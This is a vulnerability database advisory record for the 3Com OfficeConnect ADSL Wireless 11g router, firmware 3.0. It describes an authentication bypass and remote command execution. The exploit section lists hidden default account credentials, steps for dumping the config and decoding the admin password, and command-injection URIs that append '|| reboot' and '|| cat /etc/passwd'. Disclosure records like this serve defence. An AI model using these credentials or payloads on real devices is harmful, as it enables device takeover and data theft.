ID
VAR-E-200910-0398
TITLE
3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities
Trust: 0.3
DESCRIPTION
3Com OfficeConnect ADSL Wireless 11g Firewall Router is prone to an authentication-bypass vulnerability and a remote command-execution vulnerability.
An attacker can exploit these issues to gain unauthorized administrative access to the affected device or execute arbitrary commands. Successful exploits will completely compromise the device.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | 3com | model: | officeconnect adsl wireless 11g firewall router | scope: | eq | version: | 3.0 | Trust: 0.3 |
EXPLOIT
Attackers can use readily available tools to exploit these issues.
These example URIs and proof of concept demonstrate the issues:
1) SSH/Telnet to router using one of these hidden accounts:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
3) Type 3 to dump the configuration
4) Locate the sysPassword field:
<sysPassword value="cXdlcnR5Cg=="/>
5) Decode the admin password:
roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d
qwerty
http://www.example.com/utility.cgi?testType=1&IP=aaa || reboot
http://www.example.com/utility.cgi?testType=1&IP=aaa || cat /etc/passwd
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Access Validation Error
Trust: 0.3
CREDITS
Andrea Fabrizi
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 36722 | Trust: 0.3 |
REFERENCES
| url: | http://www.3com.com/products/en_us/detail.jsp?tab=features&sku=3crwe754g72-a&pathtype=purchase | Trust: 0.3 |
SOURCES
| db: | BID | id: | 36722 |
LAST UPDATE DATE
2022-07-27T09:59:29.044000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 36722 | date: | 2009-10-19T19:18:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 36722 | date: | 2009-10-19T00:00:00 |